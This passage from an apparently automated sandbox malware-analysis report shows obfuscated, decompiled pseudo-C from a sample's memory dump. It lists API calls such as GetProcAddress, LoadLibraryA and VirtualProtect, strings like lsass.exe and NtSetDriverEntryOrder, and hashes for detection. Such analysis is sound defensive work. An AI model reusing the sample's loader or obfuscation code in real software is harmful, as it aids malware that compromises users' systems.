					 *0x50bf0a =  *0x50bf0a + _t18;
					if(_t43 - 1 <= 0x2e52) {
						goto L5;
					}
				}
				_t76 = _t74 | 0x0000b45c;
				_t19 = ReadFile( *(_t88 - 0x34), ??, ??, ??, ??);
				_t83 = _t82 - 0x332;
				 *0x5094f4 = _t19;
				_push(_t19);
				if(_t83 < 0) {
					L11:
					 *0x50920a = _t76;
				} else {
					_t31 =  *0x5095ec; // 0x0
					 *0x5099c8 = _t31;
					 *(_t88 - 8) = _t64;
					_t64 = _t64 - 0x784f;
					if((_t76 & 0x00009fbb) > 0) {
						L9:
						_t19 = 0x9d7b1;
						 *0x509c20 =  *0x509c20 + 0x2d32fc;
						 *(_t88 - 8) = 0x2d32fc;
						_t64 = _t64 + 0x57a089;
						 *0x50bf0f =  *0x50bf0f + _t64;
						if(_t64 >= _t64) {
							_t76 =  *0x5091ba; // 0x1ef3
							goto L11;
						}
					} else {
						 *0x50bf13 = _t31;
						_t19 = 0xda;
						if(_t83 == 0) {
							goto L9;
						}
					}
				}
				 *0x50b8f5 =  *0x50b8f5 - _t86;
				_pop(_t22);
				_push( *(_t88 - 0x34));
				 *(_t88 - 8) = _t22;
				_t23 =  *(_t88 - 8);
				 *0x5091aa = _t64 - 0x85;
				 *0x50bf12 = _t23;
				_t66 =  *0x509194; // 0x0
				 *0x509760 = _t23;
				 *0x50bf13 =  *0x50bf13 - 0xffffffffffeac939;
				_t53 = _t66 - 1;
				_push(_t23);
				 *0x50b3e6 =  *0x50b3e6 - _t86;
				_t24 = E004CFCA6(_t66 - 1, 0x94a1, 0xf449, _t86, 0);
				if(_t24 >= 0) {
					if(_t24 < 0) {
						 *0x50bf0b =  *0x50bf0b + _t53 + 0x3081b7;
						 *0x509194 =  *0x509194 - 0x7528;
					}
					 *0x50bf15 = 0xcf;
					_t24 =  *0x50bf17; // -1
					 *0x50bf39 =  *0x50bf39 - 0xf449;
					 *0x50bf07 =  *0x50bf07 + _t24;
				}
				_pop(_t27);
				_push(0x4f99e2);
				_push( *0x509a7c);
				return _t27;
			}





















                      0x004f97e5
                      0x004f97e5
                      0x004f97e5
                      0x004f97ea
                      0x004f97f6
                      0x004f97fe
                      0x004f9802
                      0x004f9805
                      0x004f980c
                      0x004f9814
                      0x004f9825
                      0x004f9828
                      0x004f982e
                      0x004f9834
                      0x004f9837
                      0x004f9855
                      0x004f9855
                      0x004f985d
                      0x004f9839
                      0x004f983a
                      0x004f9845
                      0x00000000
                      0x004f984d
                      0x004f9845
                      0x004f9864
                      0x004f987c
                      0x004f9882
                      0x004f9887
                      0x004f988e
                      0x004f9891
                      0x004f9904
                      0x004f9904
                      0x004f9893
                      0x004f9893
                      0x004f9898
                      0x004f98a4
                      0x004f98aa
                      0x004f98b7
                      0x004f98cc
                      0x004f98d9
                      0x004f98e2
                      0x004f98e8
                      0x004f98ed
                      0x004f98f3
                      0x004f98fb
                      0x004f98fd
                      0x00000000
                      0x004f98fd
                      0x004f98b9
                      0x004f98b9
                      0x004f98c5
                      0x004f98ca
                      0x00000000
                      0x00000000
                      0x004f98ca
                      0x004f98b7
                      0x004f9913
                      0x004f991f
                      0x004f9920
                      0x004f9925
                      0x004f992b
                      0x004f992e
                      0x004f9938
                      0x004f9944
                      0x004f9959
                      0x004f9964
                      0x004f996a
                      0x004f996c
                      0x004f996d
                      0x004f9975
                      0x004f997c
                      0x004f9980
                      0x004f998f
                      0x004f99a6
                      0x004f99b0
                      0x004f99b8
                      0x004f99bf
                      0x004f99c5
                      0x004f99cb
                      0x004f99cb
                      0x004f99d5
                      0x004f99d6
                      0x004f99db
                      0x004f99e1

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID: G.V$MapUserPhysicalPages$NtSetDriverEntryOrder$WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll
                      • API String ID: 2738559852-543457631
                      • Opcode ID: b013e44b998be32d82bc1eeb0a002b1799ea455b3b75d076d6fd1a44f61c428a
                      • Instruction ID: 69860d8440ca08b454fd6ee87b4648ea6834a2142894cf6a27f51af7cb68f5f8
                      • Opcode Fuzzy Hash: b013e44b998be32d82bc1eeb0a002b1799ea455b3b75d076d6fd1a44f61c428a
                      • Instruction Fuzzy Hash: 7741F275A542474FEB019F79ECE57CD3BE2EB3A310B08482AD950873A7D3690949EB14
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004A2425 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 130libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 38%
                      			E004A2425(signed int __ebx, void* __edi, signed int __esi) {
				unsigned short _t27;
				unsigned short _t31;
				_Unknown_base(*)()* _t32;
				unsigned short _t36;
				signed int _t39;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t75;
				void* _t76;
				signed int _t78;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed char _t85;
				signed short _t88;
				intOrPtr _t90;
				void* _t95;

				_t94 = __esi;
				_t92 = __edi;
				_t39 = __ebx;
				_t27 =  *(_t95 - 8);
				 *(_t95 - 0x18) = __ebx;
				if(__ebx == __ebx) {
					 *((intOrPtr*)(_t95 - 0x28)) =  *((intOrPtr*)(_t95 - 0x28)) - 0x6484;
					_t75 =  *0x509192; // 0x9624
					 *0x5091fa = 0x8bf0;
					_t88 = 0x8c9e;
					_t94 =  !__esi;
					 *0x50bf14 = _t27;
					_t92 = 0;
					_t39 = 0x1f8f;
				}
				 *(_t95 - 0x10) = _t27;
				if(_t39 > 0x3641) {
					_t39 = 0x45dfb8;
					 *((intOrPtr*)(_t95 - 0x20)) = _t75;
				}
				_t76 = _t75 - 0x77;
				 *(_t95 - 8) = _t27;
				if(_t27 < 0x17c3) {
					 *(_t95 - 0x18) =  !(_t39 + 0x2a868e);
				}
				_t78 =  !(_t76 - 0x60);
				 *0x50917e = _t78;
				_push( *0x509528);
				_t41 =  *((intOrPtr*)(_t95 - 0x20)) + 0x3a;
				_t31 =  *(_t95 - 8);
				 *((intOrPtr*)(_t95 - 0x1c)) = _t41;
				if(_t41 == _t41) {
					_t78 = 0x68b2;
					_t90 =  *0x5091b6; // 0xc472
					_t88 = _t90 - 0x9800;
					 *0x509224 = _t94;
					if(_t31 < 0) {
						 *0x50b9ff =  *0x50b9ff + _t92;
					}
					 *0x5094f4 = _t31;
				}
				 *((intOrPtr*)(_t95 - 0x24)) =  *((intOrPtr*)(_t95 - 0x24)) - _t78;
				_t79 = _t78 - 0x6cfa7f;
				if((_t88 & 0x00008947) < 0) {
					 *0x5091d6 = _t88;
					_t88 = 0x509226;
					_t94 = _t94 + 1;
					 *0x50bf13 = _t31;
				}
				_t44 =  *0x50bf15; // 0x0
				_t32 = GetProcAddress(??, ??);
				 *0x50abf4 =  *0x50abf4 - _t88;
				 *0x50bf12 = _t32;
				 *(_t95 - 8) = _t32;
				E0046624A(_t32, _t79, _t88, _t92, _t94, _t32);
				 *0x5090c4 =  *0x5090c4 + (_t44 - 0x000024de | 0x002f35ea);
				_t80 = _t79 + 1;
				 *0x50915e =  *0x50915e + _t80;
				_t82 = (_t80 ^ 0x006eda3e) + 0x75ec80;
				 *0x5091fa = 0x9340;
				 *0x509078 =  *0x509078 - 0x1aef02;
				if(0x55 >= 0x55) {
				}
				_t85 = (_t82 & 0x00000066) + 0x61a599;
				 *0x5091ac = _t85;
				_t36 =  *(_t95 - 8);
				 *0x50a8fc = _t36;
				 *0x509134 = _t85;
				 *(_t95 - 8) = _t36;
				_push(1);
				_push(0x4a2615);
				_push(E0046624A);
				return _t36 >> _t85;
			}




















                      0x004a2425
                      0x004a2425
                      0x004a2425
                      0x004a2425
                      0x004a2428
                      0x004a242d
                      0x004a2436
                      0x004a243c
                      0x004a2447
                      0x004a244e
                      0x004a2454
                      0x004a2456
                      0x004a2468
                      0x004a246d
                      0x004a246d
                      0x004a2472
                      0x004a247a
                      0x004a247f
                      0x004a2484
                      0x004a2484
                      0x004a248d
                      0x004a2490
                      0x004a2497
                      0x004a24a3
                      0x004a24a3
                      0x004a24af
                      0x004a24b1
                      0x004a24b8
                      0x004a24c6
                      0x004a24c9
                      0x004a24cc
                      0x004a24d2
                      0x004a24d7
                      0x004a24de
                      0x004a24e5
                      0x004a24ea
                      0x004a24f9
                      0x004a24fd
                      0x004a2503
                      0x004a250b
                      0x004a251c
                      0x004a2526
                      0x004a252c
                      0x004a2537
                      0x004a2539
                      0x004a2543
                      0x004a2549
                      0x004a254a
                      0x004a2552
                      0x004a2558
                      0x004a255e
                      0x004a2564
                      0x004a256a
                      0x004a2570
                      0x004a2574
                      0x004a2587
                      0x004a2593
                      0x004a2594
                      0x004a25a1
                      0x004a25ab
                      0x004a25ba
                      0x004a25c9
                      0x004a25c9
                      0x004a25d9
                      0x004a25da
                      0x004a25e4
                      0x004a25e7
                      0x004a25ec
                      0x004a25f3
                      0x004a2608
                      0x004a260a
                      0x004a260f
                      0x004a2614

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: A6$HMETAFILEPICT_UserSize$NtSetDriverEntryOrder$WSManHTTPConfig.exe$_isdel.exe
                      • API String ID: 190572456-2426748350
                      • Opcode ID: 91ad246b887e84d9937a1272d5eaef3181bc796c486856d3242dc0ffb7bbc0db
                      • Instruction ID: 29cc924d3efdcf558e44a0a19b0281d4db837051aa641c1518c04c0950987f7e
                      • Opcode Fuzzy Hash: 91ad246b887e84d9937a1272d5eaef3181bc796c486856d3242dc0ffb7bbc0db
                      • Instruction Fuzzy Hash: 4D41AF75E452078FDB00EF78EDA86DD7BB0FB3A320F08442AC94597366E2780545EB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00487519 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 109libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(0034CF6A,00000001), ref: 0048767D
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: P@.$RtlReleaseRelativeName$i"$lsass.exe$wuapi.dll
                      • API String ID: 190572456-3199093101
                      • Opcode ID: edf52f53267c5d8bc9fe93feccd6869084651a64fab75a745e2f5f15a9f9d45b
                      • Instruction ID: 9f76a2d0efd0808698985920b7cb1083ce84913dd00e468bcb1f9471c6a7be5f
                      • Opcode Fuzzy Hash: edf52f53267c5d8bc9fe93feccd6869084651a64fab75a745e2f5f15a9f9d45b
                      • Instruction Fuzzy Hash: B341DD75A903069BDB00EFB8DC947DC7FB0EB29320F14457AA944E73A6E3784949DB09
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0048612C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 95libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 004861BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$IMCCPHR.exe$OSProvider.dll$RtlReleaseRelativeName$wuapi.dll
                      • API String ID: 190572456-2251616715
                      • Opcode ID: ef47649ccf2337c4fcae72d43d769eac80a3773b2cfe6f7c0693458a50d3eb7b
                      • Instruction ID: 96f18e93604dc53cd786b88e902b8be42ed8e8a9f3da2c776e553b7e533bb983
                      • Opcode Fuzzy Hash: ef47649ccf2337c4fcae72d43d769eac80a3773b2cfe6f7c0693458a50d3eb7b
                      • Instruction Fuzzy Hash: FD315EB8E50206AFCB40EFA9D8D45DDBBF1FB28310F5084AAA544E7352E2754A858B45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0049ACFF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 137libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0049AEEC
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: |z$NtSetDriverEntryOrder$RegDeleteKeyExW$WFServicesReg.exe
                      • API String ID: 190572456-921050554
                      • Opcode ID: dadb75853f3544d3dfa7101fe6e4c6577e319bacc15cdb8ef1435ccb74896be1
                      • Instruction ID: 96f04bcd93e5bcb3d3475e432c18fceb3367970385e61c3297cb7be2eb6d563d
                      • Opcode Fuzzy Hash: dadb75853f3544d3dfa7101fe6e4c6577e319bacc15cdb8ef1435ccb74896be1
                      • Instruction Fuzzy Hash: 89519FA5A453469FDB009FB8EC981CE7FF1EB79320B08446AC840A7766E3350949EB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004A4297 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G`}$PX/$RegDeleteKeyExW$dpnet.dll
                      • API String ID: 190572456-194329602
                      • Opcode ID: 7908ead54665570a050e3c9a7a4c473c85ca06acbc5ea0ba91d0b9bf6b68e0fd
                      • Instruction ID: fa9d7f7b431aeb8cfc05583b053dc537c6d8c986353bce48fdbebf8aaf3ec5c5
                      • Opcode Fuzzy Hash: 7908ead54665570a050e3c9a7a4c473c85ca06acbc5ea0ba91d0b9bf6b68e0fd
                      • Instruction Fuzzy Hash: DC41E1B5F403069FEB009FA9EC942DD7BB0FB7A300F04402AD945A7322E3780948DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0049E29A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E0049E29A(void* __ebx, void* __ecx, short __edx, void* __edi, short __esi) {
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t45;
				signed int _t53;
				short _t81;
				short _t92;
				void* _t97;

				_t92 = __esi;
				_t81 = __edx;
				_t28 =  *(_t97 - 8);
				_t53 = "CoLockObjectExternal";
				 *(_t97 - 0x1c) = _t53;
				if(__ecx != __ecx) {
				}
				 *(_t97 - 8) = _t28;
				 *(_t97 - 0x14) = _t53;
				 *(_t97 - 0x10) =  !_t53;
				 *((intOrPtr*)(_t97 - 0x20)) = 0xfffffffffffffff0;
				 *0x5091be = _t81;
				 *(_t97 - 0x1c) = 0x30a778;
				_t79 = 0x658e;
				 *0x509194 = 0x658e;
				 *0x509232 = _t92;
				_t42 = GetProcAddress( *0x5094c4,  *(_t97 - 0x58));
				 *0x5091e8 =  *0x5091e8 -  !0x9cbf;
				if(_t42 >= 0) {
					 *0x50bf17 = _t42;
					 *0x509068 =  *0x509068 + _t42;
					_t79 = 0x6f87;
					 *0x50919c = 0;
				}
				 *(_t97 - 8) = _t42;
				_t45 =  *(_t97 - 8);
				 *0x50a38c = _t45;
				 *(_t97 - 8) = _t45;
				 *((intOrPtr*)(_t97 - 0x18)) = 0x3556d3;
				 *0x50bf0e =  *0x50bf0e - _t79;
				 *0x509172 = _t79;
				_push(0);
				_push(0);
				_push(E0049E43C);
				_push(E00466493);
				return "api-ms-win-core-namedpipe-l1-1-0.dll";
			}










                      0x0049e29a
                      0x0049e29a
                      0x0049e2b0
                      0x0049e2b3
                      0x0049e2b8
                      0x0049e2bd
                      0x0049e2bd
                      0x0049e2c3
                      0x0049e2d1
                      0x0049e2f5
                      0x0049e301
                      0x0049e310
                      0x0049e34c
                      0x0049e351
                      0x0049e359
                      0x0049e36c
                      0x0049e37a
                      0x0049e380
                      0x0049e391
                      0x0049e39d
                      0x0049e3a9
                      0x0049e3c2
                      0x0049e3c6
                      0x0049e3c6
                      0x0049e3cf
                      0x0049e3db
                      0x0049e3e0
                      0x0049e3e8
                      0x0049e3f8
                      0x0049e400
                      0x0049e406
                      0x0049e42d
                      0x0049e42f
                      0x0049e431
                      0x0049e436
                      0x0049e43b

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0049E37A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: CoLockObjectExternal$System.Xml.XmlDocument.dll$api-ms-win-core-namedpipe-l1-1-0.dll$dpnet.dll
                      • API String ID: 190572456-3678666635
                      • Opcode ID: 1d2f4792602e884e94149346021dbc3170761fd6e0954eab118fd8d1944bb4b1
                      • Instruction ID: 5802341196f50252b691e5d22b055162431739beaeab9fbd15fc10aff236aca4
                      • Opcode Fuzzy Hash: 1d2f4792602e884e94149346021dbc3170761fd6e0954eab118fd8d1944bb4b1
                      • Instruction Fuzzy Hash: 65418B78A503078FCB00EFB9D8956DD7FB0FB28320F404079A945EB356D2785A89DB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0048E378 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(00000001,?), ref: 0048E481
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: NtPowerInformation$RegDeleteKeyExW$api-ms-win-core-localization-l1-1-0.dll$wuapi.dll
                      • API String ID: 190572456-1757965098
                      • Opcode ID: a2524ce9b262307449db36b76079d3b283814d74b0bb401a63274798df064788
                      • Instruction ID: 12eb7d0b01f60a2eb0e7f533919c9d49ba91fdc9a8895f3c4e38592a38ca1dc9
                      • Opcode Fuzzy Hash: a2524ce9b262307449db36b76079d3b283814d74b0bb401a63274798df064788
                      • Instruction Fuzzy Hash: 6341D075E4030AAFDB00EFB9D8956DE7BB0FB28714F00442AE944A7396E3780989DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0049FFAC Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 106libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 004A0110
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: System.Xml.XmlDocument.dll$WinFax.dll$mscpxl32.dLL$.;
                      • API String ID: 190572456-389468254
                      • Opcode ID: aea1ad52d7b82e2fcec096bf515ec5bbf7127c948d52636fb4f678d5d13b8fa2
                      • Instruction ID: 071598ed832862a5869099791c9d62c9383e8f6a203e3860c0e53757b1a00eaf
                      • Opcode Fuzzy Hash: aea1ad52d7b82e2fcec096bf515ec5bbf7127c948d52636fb4f678d5d13b8fa2
                      • Instruction Fuzzy Hash: 59419F74A14247DFCB00DFB8E8986DE7BB0FB3A310F0445AAD885A7366E3340A49DB41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0047ED66 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0047EE71
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll$ucmhc.dll${b$
                      • API String ID: 190572456-2742298630
                      • Opcode ID: 613266b4cb4cce2c547c498ffb83ee92eaf9eaa098accef3b2fd572d3c6a19d2
                      • Instruction ID: 92a46d0782c5da4e5dff6b82ea96a030fba7ef655aaf63908d2734e255e97e4d
                      • Opcode Fuzzy Hash: 613266b4cb4cce2c547c498ffb83ee92eaf9eaa098accef3b2fd572d3c6a19d2
                      • Instruction Fuzzy Hash: 08219CB9A04742DBD700DFBAECD46DD7BB1EB38300B08486AD84893326E3350949EB06
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004F448D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 004F450A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: MapUserPhysicalPages$`gqt$normaliz.dll
                      • API String ID: 544645111-3747997548
                      • Opcode ID: feafa5f6372eae6467669e8b1ec306047616b299c68bbe3b91d67ccd45b51ad6
                      • Instruction ID: 4f016ce403e3f08856b0998489b65140e974e3ee9e565108c68992d7c45ea5f8
                      • Opcode Fuzzy Hash: feafa5f6372eae6467669e8b1ec306047616b299c68bbe3b91d67ccd45b51ad6
                      • Instruction Fuzzy Hash: 99411466F0434A9FDB009F79DCD46EE7BB1EBBA310F084469DA40A7352D3780909DB10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0046B6C5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(00000000,00000000,?), ref: 0046B7B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: G`}$RegDeleteKeyExW$WFServicesReg.exe
                      • API String ID: 1029625771-3140686132
                      • Opcode ID: 000cb13309da6fa004a5e35d5f0782a81a3df6270ff43b311553ec43ff7b7125
                      • Instruction ID: d29cd288cd4b5d9b4da6569fe837411927f50a79af695c2348c33b52e7c0974b
                      • Opcode Fuzzy Hash: 000cb13309da6fa004a5e35d5f0782a81a3df6270ff43b311553ec43ff7b7125
                      • Instruction Fuzzy Hash: 7F417975E503469FCB00EFA9D8D42CD7BB1EB69320F14806AD945E7361E3780989DB85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004DCEC9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100sleepthreadCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: SleepTerminateThread
                      • String ID: NtSetDriverEntryOrder$`}
                      • API String ID: 480259992-4248525211
                      • Opcode ID: 5bd84efa852eec449e98121a4b51aca970a9d75e68d145accd1f428c5508e70f
                      • Instruction ID: c47e212faeb9391b402aa1c97f1b3dc505a8ab021d7480125ec56fb57a38c2cb
                      • Opcode Fuzzy Hash: 5bd84efa852eec449e98121a4b51aca970a9d75e68d145accd1f428c5508e70f
                      • Instruction Fuzzy Hash: E3319D76A552079BDB00EF74ECE82CD3BB1EB78314F04816AC44997766E3390A89EB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0046D4FE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99libraryCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: OSProvider.dll$System.Net.Primitives.dll$ucmhc.dll
                      • API String ID: 1029625771-3428230003
                      • Opcode ID: bb5de39c012d8abe049839e6621093e96f6a4b1dc0eb46ab8823c66ab3196ec1
                      • Instruction ID: b560873ed2d671b8b0cc070bc426a97e9db56d699a5e1936602f8315160afb76
                      • Opcode Fuzzy Hash: bb5de39c012d8abe049839e6621093e96f6a4b1dc0eb46ab8823c66ab3196ec1
                      • Instruction Fuzzy Hash: 0231E9A5F543478FDB009F75EC985CD3BB0FB7A320B08496AC8548776AF3290549EB46
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004D6F26 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94COMMON
                      Download Yara Rule
                      C-Code - Quality: 89%
                      			E004D6F26(int __eax, signed int __ebx, short __ecx, void* __edx) {
				int _t17;
				int _t23;
				int _t31;
				signed int _t32;
				signed int _t33;
				void* _t34;
				intOrPtr _t38;
				short _t49;
				void* _t54;
				short _t56;
				intOrPtr _t57;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;

				_t54 = __edx;
				_t49 = __ecx;
				_t32 = __ebx;
				_t17 = __eax;
				if(__ebx == __ebx) {
					_t32 = "NtSetDriverEntryOrder";
				}
				if(_t49 <= _t49) {
					if(_t49 == _t49) {
						_t49 = _t49 + 0x6f3ef1;
					}
					 *0x50bf10 =  *0x50bf10 - _t54;
				}
				_t56 =  *0x509212; // 0xc472
				_t62 = 0xab58;
				if(_t17 != 1) {
					L9:
					_t33 = _t32 + 0xef;
					 *(_t64 - 8) = _t17;
					if(_t33 <= 0x2efd) {
						L13:
						 *0x509180 = 0x6739;
						_t57 =  *0x5091b2; // 0x23e0
						_t58 = _t57 - 0x9688;
						 *0x50921e = _t57 - 0x9688;
						_t63 = _t62;
						 *0x50bf14 = 0xc1;
						_t34 = _t33 - 0xa;
						_t23 = InternetCloseHandle( *(_t64 - 0x24));
						_t35 = _t34 - 0x26d200;
						 *(_t64 - 8) = _t23;
						E004BE19A(_t23, _t58, _t61, _t63, _t34 - 0x26d200, 1, _t35);
						_push(0);
						_push(1);
						_push(E004D747D);
						goto __ebx;
					}
					_t38 =  *0x509ccc; // 0x0
					 *((intOrPtr*)(_t64 - 0xc)) =  *((intOrPtr*)(_t64 - 0xc)) + _t38;
					 *0x5091ca = _t56;
					 *0x50bf12 =  *0x50bf12 - _t17;
					 *0x50bf13 =  *0x50bf13 + _t17;
					_t62 = _t62 + _t62;
					if(_t62 < 0) {
						 *0x50bf15 = _t17;
					}
					_t33 = _t38 + 0x00000038 >> 0x00007dd5 ^ 0x00475dae;
					goto L13;
				} else {
					 *(_t64 - 8) = _t17;
					_t32 =  !0x408ebf;
					 *0x50911c = _t49;
					if( *((intOrPtr*)(_t64 - 0x48)) == 0) {
						goto L9;
					}
					 *(_t64 - 8) =  *(_t64 - 8) - 0x50908a;
					 *(_t64 - 8) = _t17;
					 *0x509b54 = 0x50908a;
